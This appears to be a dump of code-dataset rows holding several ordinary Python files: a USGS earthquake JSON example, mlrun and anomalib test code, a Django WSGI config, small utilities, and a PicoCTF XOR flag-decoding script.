hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c2c78f323d191615d8945cd2e3207743a075eb0 | 1,570 | py | Python | Ch5/jsondata_start.py | prottoyghose/python_essentials | 029e3208b4be343315d384b6f6a4d77eb25f9fcb | [
"Apache-2.0"
] | null | null | null | Ch5/jsondata_start.py | prottoyghose/python_essentials | 029e3208b4be343315d384b6f6a4d77eb25f9fcb | [
"Apache-2.0"
] | null | null | null | Ch5/jsondata_start.py | prottoyghose/python_essentials | 029e3208b4be343315d384b6f6a4d77eb25f9fcb | [
"Apache-2.0"
] | null | null | null | #
# Example file for parsing and processing JSON
#
import urllib.request
import json
def printResults(data):
# Use the json module to load the string data into a dictionary
theJSON = json.loads(data)
# now we can access the contents of the JSON like any other Python object
# if "title" in theJSON["metadata"]:
# print(theJSON["metadata"]["title"])
# output the number of events, plus the magnitude and each event name
# count = theJSON["metadata"]["count"]
# print(str(count) + " events recorded")
# for each event, print the place where it occurred
# for i in theJSON["features"]:
# print (i["properties"]["place"])
# print the events that only have a magnitude greater than 4
for i in theJSON["features"]:
if(i["properties"]["mag"] >= 4.0):
print("%2.1f" % i["properties"]["mag"], i["properties"]["place"])
print("--------------------\n")
# print only the events where at least 1 person reported feeling something
def main():
# define a variable to hold the source URL
# In this case we'll use the free data feed from the USGS
# This feed lists all earthquakes for the last day larger than Mag 2.5
urlData = "http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
# Open the URL and read the data
webUrl = urllib.request.urlopen(urlData)
print ("result code: " + str(webUrl.getcode()))
if(webUrl.getcode()==200):
data = webUrl.read()
printResults(data)
else:
print("Receieved error, cannot parse results")
if __name__ == "__main__":
main()
| 30.784314 | 86 | 0.666879 |
import urllib.request
import json
def printResults(data):
theJSON = json.loads(data)
for i in theJSON["features"]:
if(i["properties"]["mag"] >= 4.0):
print("%2.1f" % i["properties"]["mag"], i["properties"]["place"])
print("--------------------\n")
def main():
# This feed lists all earthquakes for the last day larger than Mag 2.5
urlData = "http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
# Open the URL and read the data
webUrl = urllib.request.urlopen(urlData)
print ("result code: " + str(webUrl.getcode()))
if(webUrl.getcode()==200):
data = webUrl.read()
printResults(data)
else:
print("Receieved error, cannot parse results")
if __name__ == "__main__":
main()
| true | true |
1c2c78ff440615a7440945f91e8b1bac0ee178b4 | 7,119 | py | Python | tests/integration/sdk_api/base.py | daniels290813/mlrun | c95d90c3b4ce78d9b71456333ccd201f932d60ea | [
"Apache-2.0"
] | null | null | null | tests/integration/sdk_api/base.py | daniels290813/mlrun | c95d90c3b4ce78d9b71456333ccd201f932d60ea | [
"Apache-2.0"
] | null | null | null | tests/integration/sdk_api/base.py | daniels290813/mlrun | c95d90c3b4ce78d9b71456333ccd201f932d60ea | [
"Apache-2.0"
] | null | null | null | import copy
import os
import pathlib
import subprocess
import sys
import pymysql
import mlrun
import mlrun.api.schemas
import tests.conftest
from mlrun.db.httpdb import HTTPRunDB
from mlrun.utils import create_logger, retry_until_successful
logger = create_logger(level="debug", name="test-integration")
class TestMLRunIntegration:
project_name = "system-test-project"
root_path = pathlib.Path(__file__).absolute().parent.parent.parent.parent
results_path = root_path / "tests" / "test_results" / "integration"
db_liveness_timeout = 30
db_host_internal = "host.docker.internal"
db_host_external = "localhost"
db_user = "root"
db_port = 3306
db_name = "mlrun"
db_dsn = f"mysql+pymysql://{db_user}@{db_host_internal}:{db_port}/{db_name}"
def setup_method(self, method):
self._logger = logger
self._logger.info(
f"Setting up test {self.__class__.__name__}::{method.__name__}"
)
self._run_db()
api_url = self._run_api()
self._test_env = {}
self._old_env = {}
self._setup_env({"MLRUN_DBPATH": api_url})
self.custom_setup()
self._logger.info(
f"Finished setting up test {self.__class__.__name__}::{method.__name__}"
)
def teardown_method(self, method):
self._logger.info(
f"Tearing down test {self.__class__.__name__}::{method.__name__}"
)
self.custom_teardown()
self._remove_api()
self._remove_db()
self._teardown_env()
self._logger.info(
f"Finished tearing down test {self.__class__.__name__}::{method.__name__}"
)
def custom_setup(self):
pass
def custom_teardown(self):
pass
@property
def assets_path(self):
return (
pathlib.Path(sys.modules[self.__module__].__file__).absolute().parent
/ "assets"
)
def _setup_env(self, env: dict):
self._logger.debug("Setting up test environment")
self._test_env.update(env)
# save old env vars for returning them on teardown
for env_var, value in env.items():
if env_var in os.environ:
self._old_env[env_var] = os.environ[env_var]
if value:
os.environ[env_var] = value
# reload the config so changes to the env vars will take affect
mlrun.config.config.reload()
def _teardown_env(self):
self._logger.debug("Tearing down test environment")
for env_var in self._test_env:
if env_var in os.environ:
del os.environ[env_var]
os.environ.update(self._old_env)
# reload the config so changes to the env vars will take affect
mlrun.config.config.reload()
def _run_db(self):
self._logger.debug("Starting DataBase")
self._run_command(
"make",
args=["run-test-db"],
cwd=TestMLRunIntegration.root_path,
)
output = self._run_command(
"docker",
args=["ps", "--last", "1", "-q"],
)
self.db_container_id = output.strip()
self._logger.debug("Started DataBase", container_id=self.db_container_id)
self._ensure_database_liveness(timeout=self.db_liveness_timeout)
def _run_api(self):
self._logger.debug("Starting API")
self._run_command(
"make",
args=["run-api"],
env=self._extend_current_env(
{"MLRUN_VERSION": "test-integration", "MLRUN_HTTPDB__DSN": self.db_dsn}
),
cwd=TestMLRunIntegration.root_path,
)
output = self._run_command(
"docker",
args=["ps", "--last", "1", "-q"],
)
self.api_container_id = output.strip()
# retrieve container bind port + host
output = self._run_command(
"docker", args=["port", self.api_container_id, "8080"]
)
# usually the output is something like '0.0.0.0:49154\n' but sometimes (in GH actions) it's something like
# '0.0.0.0:49154\n:::49154\n' for some reason, so just taking the first line
host = output.splitlines()[0]
url = f"http://{host}"
self._check_api_is_healthy(url)
self._logger.info(
"Successfully started API", url=url, container_id=self.api_container_id
)
return url
def _remove_api(self):
if self.api_container_id:
logs = self._run_command("docker", args=["logs", self.api_container_id])
self._logger.debug(
"Removing API container", container_id=self.api_container_id, logs=logs
)
self._run_command("docker", args=["rm", "--force", self.api_container_id])
def _remove_db(self):
if self.db_container_id:
logs = self._run_command("docker", args=["logs", self.db_container_id])
self._logger.debug(
"Removing Database container",
container_name=self.db_container_id,
logs=logs,
)
out = self._run_command(
"docker", args=["rm", "--force", self.db_container_id]
)
self._logger.debug(
"Removed Database container",
out=out,
)
def _ensure_database_liveness(self, retry_interval=2, timeout=30):
self._logger.debug("Ensuring database liveness")
retry_until_successful(
retry_interval,
timeout,
self._logger,
True,
pymysql.connect,
host=self.db_host_external,
user=self.db_user,
port=self.db_port,
database=self.db_name,
)
self._logger.debug("Database ready for connection")
@staticmethod
def _extend_current_env(env):
current_env = copy.deepcopy(os.environ)
current_env.update(env)
return current_env
@staticmethod
def _check_api_is_healthy(url):
health_url = f"{url}/{HTTPRunDB.get_api_path_prefix()}/healthz"
timeout = 30
if not tests.conftest.wait_for_server(health_url, timeout):
raise RuntimeError(f"API did not start after {timeout} sec")
@staticmethod
def _run_command(command, args=None, cwd=None, env=None):
if args:
command += " " + " ".join(args)
try:
process = subprocess.run(
command,
shell=True,
check=True,
capture_output=True,
encoding="utf-8",
cwd=cwd,
env=env,
)
except subprocess.CalledProcessError as exc:
logger.warning(
"Command failed",
stdout=exc.stdout,
stderr=exc.stderr,
return_code=exc.returncode,
cmd=exc.cmd,
env=env,
args=exc.args,
)
raise
output = process.stdout
return output
| 31.361233 | 114 | 0.580559 | import copy
import os
import pathlib
import subprocess
import sys
import pymysql
import mlrun
import mlrun.api.schemas
import tests.conftest
from mlrun.db.httpdb import HTTPRunDB
from mlrun.utils import create_logger, retry_until_successful
logger = create_logger(level="debug", name="test-integration")
class TestMLRunIntegration:
project_name = "system-test-project"
root_path = pathlib.Path(__file__).absolute().parent.parent.parent.parent
results_path = root_path / "tests" / "test_results" / "integration"
db_liveness_timeout = 30
db_host_internal = "host.docker.internal"
db_host_external = "localhost"
db_user = "root"
db_port = 3306
db_name = "mlrun"
db_dsn = f"mysql+pymysql://{db_user}@{db_host_internal}:{db_port}/{db_name}"
def setup_method(self, method):
self._logger = logger
self._logger.info(
f"Setting up test {self.__class__.__name__}::{method.__name__}"
)
self._run_db()
api_url = self._run_api()
self._test_env = {}
self._old_env = {}
self._setup_env({"MLRUN_DBPATH": api_url})
self.custom_setup()
self._logger.info(
f"Finished setting up test {self.__class__.__name__}::{method.__name__}"
)
def teardown_method(self, method):
self._logger.info(
f"Tearing down test {self.__class__.__name__}::{method.__name__}"
)
self.custom_teardown()
self._remove_api()
self._remove_db()
self._teardown_env()
self._logger.info(
f"Finished tearing down test {self.__class__.__name__}::{method.__name__}"
)
def custom_setup(self):
pass
def custom_teardown(self):
pass
@property
def assets_path(self):
return (
pathlib.Path(sys.modules[self.__module__].__file__).absolute().parent
/ "assets"
)
def _setup_env(self, env: dict):
self._logger.debug("Setting up test environment")
self._test_env.update(env)
for env_var, value in env.items():
if env_var in os.environ:
self._old_env[env_var] = os.environ[env_var]
if value:
os.environ[env_var] = value
mlrun.config.config.reload()
def _teardown_env(self):
self._logger.debug("Tearing down test environment")
for env_var in self._test_env:
if env_var in os.environ:
del os.environ[env_var]
os.environ.update(self._old_env)
mlrun.config.config.reload()
def _run_db(self):
self._logger.debug("Starting DataBase")
self._run_command(
"make",
args=["run-test-db"],
cwd=TestMLRunIntegration.root_path,
)
output = self._run_command(
"docker",
args=["ps", "--last", "1", "-q"],
)
self.db_container_id = output.strip()
self._logger.debug("Started DataBase", container_id=self.db_container_id)
self._ensure_database_liveness(timeout=self.db_liveness_timeout)
def _run_api(self):
self._logger.debug("Starting API")
self._run_command(
"make",
args=["run-api"],
env=self._extend_current_env(
{"MLRUN_VERSION": "test-integration", "MLRUN_HTTPDB__DSN": self.db_dsn}
),
cwd=TestMLRunIntegration.root_path,
)
output = self._run_command(
"docker",
args=["ps", "--last", "1", "-q"],
)
self.api_container_id = output.strip()
output = self._run_command(
"docker", args=["port", self.api_container_id, "8080"]
)
# '0.0.0.0:49154\n:::49154\n' for some reason, so just taking the first line
host = output.splitlines()[0]
url = f"http://{host}"
self._check_api_is_healthy(url)
self._logger.info(
"Successfully started API", url=url, container_id=self.api_container_id
)
return url
def _remove_api(self):
if self.api_container_id:
logs = self._run_command("docker", args=["logs", self.api_container_id])
self._logger.debug(
"Removing API container", container_id=self.api_container_id, logs=logs
)
self._run_command("docker", args=["rm", "--force", self.api_container_id])
def _remove_db(self):
if self.db_container_id:
logs = self._run_command("docker", args=["logs", self.db_container_id])
self._logger.debug(
"Removing Database container",
container_name=self.db_container_id,
logs=logs,
)
out = self._run_command(
"docker", args=["rm", "--force", self.db_container_id]
)
self._logger.debug(
"Removed Database container",
out=out,
)
def _ensure_database_liveness(self, retry_interval=2, timeout=30):
self._logger.debug("Ensuring database liveness")
retry_until_successful(
retry_interval,
timeout,
self._logger,
True,
pymysql.connect,
host=self.db_host_external,
user=self.db_user,
port=self.db_port,
database=self.db_name,
)
self._logger.debug("Database ready for connection")
@staticmethod
def _extend_current_env(env):
current_env = copy.deepcopy(os.environ)
current_env.update(env)
return current_env
@staticmethod
def _check_api_is_healthy(url):
health_url = f"{url}/{HTTPRunDB.get_api_path_prefix()}/healthz"
timeout = 30
if not tests.conftest.wait_for_server(health_url, timeout):
raise RuntimeError(f"API did not start after {timeout} sec")
@staticmethod
def _run_command(command, args=None, cwd=None, env=None):
if args:
command += " " + " ".join(args)
try:
process = subprocess.run(
command,
shell=True,
check=True,
capture_output=True,
encoding="utf-8",
cwd=cwd,
env=env,
)
except subprocess.CalledProcessError as exc:
logger.warning(
"Command failed",
stdout=exc.stdout,
stderr=exc.stderr,
return_code=exc.returncode,
cmd=exc.cmd,
env=env,
args=exc.args,
)
raise
output = process.stdout
return output
| true | true |
1c2c793926370a302016f44032ba3bdd72a3fa41 | 401 | py | Python | radon_server/wsgi.py | leo212/radon_transform | 04721c365d01e9b6a17eba4130a13d453844e27d | [
"Apache-2.0"
] | null | null | null | radon_server/wsgi.py | leo212/radon_transform | 04721c365d01e9b6a17eba4130a13d453844e27d | [
"Apache-2.0"
] | 2 | 2021-03-19T01:28:34.000Z | 2022-01-13T01:19:59.000Z | radon_server/wsgi.py | leo212/radon_transform | 04721c365d01e9b6a17eba4130a13d453844e27d | [
"Apache-2.0"
] | null | null | null | """
WSGI config for radon_server project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'radon_server.settings')
application = get_wsgi_application()
| 23.588235 | 78 | 0.790524 |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'radon_server.settings')
application = get_wsgi_application()
| true | true |
1c2c7a20db73d48b38cdb71eedae1aceaf185ef0 | 667 | py | Python | application/utilities/dict_mapping.py | kelp404/Victory | 132f186f18ea6a709afb003e38ed1d6de3c0579f | [
"MIT"
] | 15 | 2015-02-15T16:40:19.000Z | 2021-02-01T21:31:26.000Z | application/utilities/dict_mapping.py | kelp404/Victory | 132f186f18ea6a709afb003e38ed1d6de3c0579f | [
"MIT"
] | null | null | null | application/utilities/dict_mapping.py | kelp404/Victory | 132f186f18ea6a709afb003e38ed1d6de3c0579f | [
"MIT"
] | 1 | 2015-06-02T07:48:30.000Z | 2015-06-02T07:48:30.000Z |
class DictMapping:
"""
Dictionary Mapping
copy all values in the dict object to the custom class instance.
"""
@staticmethod
def inject(strong, dic):
"""
copy all value in dic to strong
@param strong a custom class instance
@param dic a dict object
"""
if isinstance(dic, dict):
# dict object
for name in dir(strong):
try:
if name[:2] != '__' and name in dic:
setattr(strong, name, dic[name])
except: pass
else:
# class
DictMapping.inject(strong, dic.__dict__)
| 26.68 | 68 | 0.506747 |
class DictMapping:
@staticmethod
def inject(strong, dic):
if isinstance(dic, dict):
for name in dir(strong):
try:
if name[:2] != '__' and name in dic:
setattr(strong, name, dic[name])
except: pass
else:
DictMapping.inject(strong, dic.__dict__)
| true | true |
1c2c7a3489682f5b904e53760dcaba38a92ea875 | 82 | py | Python | n2survey/plot/__init__.py | N2-Survey/SurveyFramework | 8295fd9808c95db85befb1f60391460908a7d2b0 | [
"MIT"
] | 1 | 2022-01-26T19:04:38.000Z | 2022-01-26T19:04:38.000Z | n2survey/plot/__init__.py | N2-Survey/SurveyFramework | 8295fd9808c95db85befb1f60391460908a7d2b0 | [
"MIT"
] | 77 | 2021-09-14T09:33:03.000Z | 2022-03-31T18:02:47.000Z | n2survey/plot/__init__.py | N2-Survey/SurveyFramework | 8295fd9808c95db85befb1f60391460908a7d2b0 | [
"MIT"
] | 3 | 2021-09-14T20:11:28.000Z | 2021-12-26T11:56:25.000Z | from .bar import *
from .plot_likert import *
from .plot_multiple_choice import *
| 20.5 | 35 | 0.780488 | from .bar import *
from .plot_likert import *
from .plot_multiple_choice import *
| true | true |
1c2c7b901ddafeb5c8002732ecae960943849e2f | 279 | py | Python | PicoCTF 2018/Reversing/quackme/solve1.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 51 | 2018-06-26T09:49:42.000Z | 2019-09-14T00:06:35.000Z | PicoCTF 2018/Reversing/quackme/solve1.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 1 | 2018-06-29T18:40:59.000Z | 2018-07-09T20:29:41.000Z | PicoCTF 2018/Reversing/quackme/solve1.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 22 | 2019-10-03T14:52:43.000Z | 2022-01-17T08:55:10.000Z | #!/usr/bin/env python3
key = b"\x29\x06\x16\x4F\x2B\x35\x30\x1E\x51\x1B\x5B\x14\x4B\x08\x5D\x2B\x5C\x10\x06\x06\x18\x45\x51\x00\x5D"
cipher = b"You have now entered the Duck Web, and you're in for a honk"
flag = "".join(chr(k^c) for k,c in zip(key,cipher[:len(key)]))
print(flag) | 55.8 | 109 | 0.695341 |
key = b"\x29\x06\x16\x4F\x2B\x35\x30\x1E\x51\x1B\x5B\x14\x4B\x08\x5D\x2B\x5C\x10\x06\x06\x18\x45\x51\x00\x5D"
cipher = b"You have now entered the Duck Web, and you're in for a honk"
flag = "".join(chr(k^c) for k,c in zip(key,cipher[:len(key)]))
print(flag) | true | true |
1c2c7c7b409d735c707e4a4f5156d62ffa140283 | 8,243 | py | Python | tests/pre_merge/datasets/test_dataset.py | DavidHribek/anomalib | d8f6674bc4669fbad88cb61c235b1a2532ae44f5 | [
"Apache-2.0"
] | null | null | null | tests/pre_merge/datasets/test_dataset.py | DavidHribek/anomalib | d8f6674bc4669fbad88cb61c235b1a2532ae44f5 | [
"Apache-2.0"
] | null | null | null | tests/pre_merge/datasets/test_dataset.py | DavidHribek/anomalib | d8f6674bc4669fbad88cb61c235b1a2532ae44f5 | [
"Apache-2.0"
] | null | null | null | """Test Dataset."""
import os
import numpy as np
import pytest
from anomalib.config import get_configurable_parameters, update_input_size_config
from anomalib.data import (
BTechDataModule,
FolderDataModule,
MVTecDataModule,
get_datamodule,
)
from anomalib.pre_processing.transforms import Denormalize, ToNumpy
from tests.helpers.dataset import TestDataset, get_dataset_path
@pytest.fixture(autouse=True)
def mvtec_data_module():
datamodule = MVTecDataModule(
root=get_dataset_path(dataset="MVTec"),
category="leather",
image_size=(256, 256),
train_batch_size=1,
test_batch_size=1,
num_workers=0,
)
datamodule.prepare_data()
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def btech_data_module():
"""Create BTech Data Module."""
datamodule = BTechDataModule(
root=get_dataset_path(dataset="BTech"),
category="01",
image_size=(256, 256),
train_batch_size=1,
test_batch_size=1,
num_workers=0,
)
datamodule.prepare_data()
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def folder_data_module():
"""Create Folder Data Module."""
root = get_dataset_path(dataset="bottle")
datamodule = FolderDataModule(
root=root,
normal="good",
abnormal="broken_large",
mask_dir=os.path.join(root, "ground_truth/broken_large"),
task="segmentation",
split_ratio=0.2,
seed=0,
image_size=(256, 256),
train_batch_size=32,
test_batch_size=32,
num_workers=8,
create_validation_set=True,
)
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def data_sample(mvtec_data_module):
_, data = next(enumerate(mvtec_data_module.train_dataloader()))
return data
class TestMVTecDataModule:
"""Test MVTec AD Data Module."""
def test_batch_size(self, mvtec_data_module):
"""test_mvtec_datamodule [summary]"""
_, train_data_sample = next(enumerate(mvtec_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(mvtec_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 1
assert val_data_sample["image"].shape[0] == 1
def test_val_and_test_dataloaders_has_mask_and_gt(self, mvtec_data_module):
"""Test Validation and Test dataloaders should return filenames, image, mask and label."""
_, val_data = next(enumerate(mvtec_data_module.val_dataloader()))
_, test_data = next(enumerate(mvtec_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestBTechDataModule:
"""Test BTech Data Module."""
def test_batch_size(self, btech_data_module):
"""Test batch size."""
_, train_data_sample = next(enumerate(btech_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(btech_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 1
assert val_data_sample["image"].shape[0] == 1
def test_val_and_test_dataloaders_has_mask_and_gt(self, btech_data_module):
"""Test Validation and Test dataloaders should return filenames, image, mask and label."""
_, val_data = next(enumerate(btech_data_module.val_dataloader()))
_, test_data = next(enumerate(btech_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestFolderDataModule:
"""Test Folder Data Module."""
def test_batch_size(self, folder_data_module):
"""Test batch size."""
_, train_data_sample = next(enumerate(folder_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(folder_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 16
assert val_data_sample["image"].shape[0] == 12
def test_val_and_test_dataloaders_has_mask_and_gt(self, folder_data_module):
"""Test Validation and Test dataloaders should return filenames, image, mask and label."""
_, val_data = next(enumerate(folder_data_module.val_dataloader()))
_, test_data = next(enumerate(folder_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestDenormalize:
"""Test Denormalize Util."""
def test_denormalize_image_pixel_values(self, data_sample):
"""Test Denormalize denormalizes tensor into [0, 256] range."""
denormalized_sample = Denormalize().__call__(data_sample["image"].squeeze())
assert denormalized_sample.min() >= 0 and denormalized_sample.max() <= 256
def test_denormalize_return_numpy(self, data_sample):
"""Denormalize should return a numpy array."""
denormalized_sample = Denormalize()(data_sample["image"].squeeze())
assert isinstance(denormalized_sample, np.ndarray)
def test_denormalize_channel_order(self, data_sample):
"""Denormalize should return a numpy array of order [HxWxC]"""
denormalized_sample = Denormalize().__call__(data_sample["image"].squeeze())
assert len(denormalized_sample.shape) == 3 and denormalized_sample.shape[-1] == 3
def test_representation(self):
"""Test Denormalize representation should return string
Denormalize()"""
assert str(Denormalize()) == "Denormalize()"
class TestToNumpy:
"""Test ToNumpy whether it properly converts tensor into numpy array."""
def test_to_numpy_image_pixel_values(self, data_sample):
"""Test ToNumpy should return an array whose pixels in the range of [0,
256]"""
array = ToNumpy()(data_sample["image"])
assert array.min() >= 0 and array.max() <= 256
def test_to_numpy_converts_tensor_to_np_array(self, data_sample):
"""ToNumpy returns a numpy array."""
array = ToNumpy()(data_sample["image"])
assert isinstance(array, np.ndarray)
def test_to_numpy_channel_order(self, data_sample):
"""ToNumpy() should return a numpy array of order [HxWxC]"""
array = ToNumpy()(data_sample["image"])
assert len(array.shape) == 3 and array.shape[-1] == 3
def test_one_channel_images(self, data_sample):
"""One channel tensor should be converted to HxW np array."""
data = data_sample["image"][:, 0, :, :].unsqueeze(0)
array = ToNumpy()(data)
assert len(array.shape) == 2
def test_representation(self):
"""Test ToNumpy() representation should return string `ToNumpy()`"""
assert str(ToNumpy()) == "ToNumpy()"
class TestConfigToDataModule:
"""Tests that check if the dataset parameters in the config achieve the desired effect."""
@pytest.mark.parametrize(
["input_size", "effective_image_size"],
[
(512, (512, 512)),
((245, 276), (245, 276)),
((263, 134), (263, 134)),
((267, 267), (267, 267)),
],
)
@TestDataset(num_train=20, num_test=10)
def test_image_size(self, input_size, effective_image_size, category="shapes", path=""):
"""Test if the image size parameter works as expected."""
model_name = "stfpm"
configurable_parameters = get_configurable_parameters(model_name)
configurable_parameters.dataset.path = path
configurable_parameters.dataset.category = category
configurable_parameters.dataset.image_size = input_size
configurable_parameters = update_input_size_config(configurable_parameters)
data_module = get_datamodule(configurable_parameters)
data_module.setup()
assert iter(data_module.train_dataloader()).__next__()["image"].shape[-2:] == effective_image_size
| 37.986175 | 106 | 0.677787 |
import os
import numpy as np
import pytest
from anomalib.config import get_configurable_parameters, update_input_size_config
from anomalib.data import (
BTechDataModule,
FolderDataModule,
MVTecDataModule,
get_datamodule,
)
from anomalib.pre_processing.transforms import Denormalize, ToNumpy
from tests.helpers.dataset import TestDataset, get_dataset_path
@pytest.fixture(autouse=True)
def mvtec_data_module():
datamodule = MVTecDataModule(
root=get_dataset_path(dataset="MVTec"),
category="leather",
image_size=(256, 256),
train_batch_size=1,
test_batch_size=1,
num_workers=0,
)
datamodule.prepare_data()
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def btech_data_module():
datamodule = BTechDataModule(
root=get_dataset_path(dataset="BTech"),
category="01",
image_size=(256, 256),
train_batch_size=1,
test_batch_size=1,
num_workers=0,
)
datamodule.prepare_data()
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def folder_data_module():
root = get_dataset_path(dataset="bottle")
datamodule = FolderDataModule(
root=root,
normal="good",
abnormal="broken_large",
mask_dir=os.path.join(root, "ground_truth/broken_large"),
task="segmentation",
split_ratio=0.2,
seed=0,
image_size=(256, 256),
train_batch_size=32,
test_batch_size=32,
num_workers=8,
create_validation_set=True,
)
datamodule.setup()
return datamodule
@pytest.fixture(autouse=True)
def data_sample(mvtec_data_module):
_, data = next(enumerate(mvtec_data_module.train_dataloader()))
return data
class TestMVTecDataModule:
def test_batch_size(self, mvtec_data_module):
_, train_data_sample = next(enumerate(mvtec_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(mvtec_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 1
assert val_data_sample["image"].shape[0] == 1
def test_val_and_test_dataloaders_has_mask_and_gt(self, mvtec_data_module):
_, val_data = next(enumerate(mvtec_data_module.val_dataloader()))
_, test_data = next(enumerate(mvtec_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestBTechDataModule:
def test_batch_size(self, btech_data_module):
_, train_data_sample = next(enumerate(btech_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(btech_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 1
assert val_data_sample["image"].shape[0] == 1
def test_val_and_test_dataloaders_has_mask_and_gt(self, btech_data_module):
_, val_data = next(enumerate(btech_data_module.val_dataloader()))
_, test_data = next(enumerate(btech_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestFolderDataModule:
def test_batch_size(self, folder_data_module):
_, train_data_sample = next(enumerate(folder_data_module.train_dataloader()))
_, val_data_sample = next(enumerate(folder_data_module.val_dataloader()))
assert train_data_sample["image"].shape[0] == 16
assert val_data_sample["image"].shape[0] == 12
def test_val_and_test_dataloaders_has_mask_and_gt(self, folder_data_module):
_, val_data = next(enumerate(folder_data_module.val_dataloader()))
_, test_data = next(enumerate(folder_data_module.test_dataloader()))
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(val_data.keys())
assert sorted(["image_path", "mask_path", "image", "label", "mask"]) == sorted(test_data.keys())
class TestDenormalize:
def test_denormalize_image_pixel_values(self, data_sample):
denormalized_sample = Denormalize().__call__(data_sample["image"].squeeze())
assert denormalized_sample.min() >= 0 and denormalized_sample.max() <= 256
def test_denormalize_return_numpy(self, data_sample):
denormalized_sample = Denormalize()(data_sample["image"].squeeze())
assert isinstance(denormalized_sample, np.ndarray)
def test_denormalize_channel_order(self, data_sample):
denormalized_sample = Denormalize().__call__(data_sample["image"].squeeze())
assert len(denormalized_sample.shape) == 3 and denormalized_sample.shape[-1] == 3
def test_representation(self):
assert str(Denormalize()) == "Denormalize()"
class TestToNumpy:
    """Tests for the ToNumpy transform."""

    def test_to_numpy_image_pixel_values(self, data_sample):
        """Converted pixel values fall back into the displayable [0, 256] range."""
        converted = ToNumpy()(data_sample["image"])
        assert converted.min() >= 0 and converted.max() <= 256

    def test_to_numpy_converts_tensor_to_np_array(self, data_sample):
        """ToNumpy returns a numpy array."""
        converted = ToNumpy()(data_sample["image"])
        assert isinstance(converted, np.ndarray)

    def test_to_numpy_channel_order(self, data_sample):
        """Output is channel-last (HWC) with three channels."""
        converted = ToNumpy()(data_sample["image"])
        assert len(converted.shape) == 3 and converted.shape[-1] == 3

    def test_one_channel_images(self, data_sample):
        """A single-channel image collapses to a 2-D array."""
        single_channel = data_sample["image"][:, 0, :, :].unsqueeze(0)
        converted = ToNumpy()(single_channel)
        assert len(converted.shape) == 2

    def test_representation(self):
        """String representation is the bare class-call form."""
        assert str(ToNumpy()) == "ToNumpy()"
class TestConfigToDataModule:
    """Tests that config-driven image sizes propagate into the datamodule."""

    @pytest.mark.parametrize(
        ["input_size", "effective_image_size"],
        [
            (512, (512, 512)),
            ((245, 276), (245, 276)),
            ((263, 134), (263, 134)),
            ((267, 267), (267, 267)),
        ],
    )
    @TestDataset(num_train=20, num_test=10)
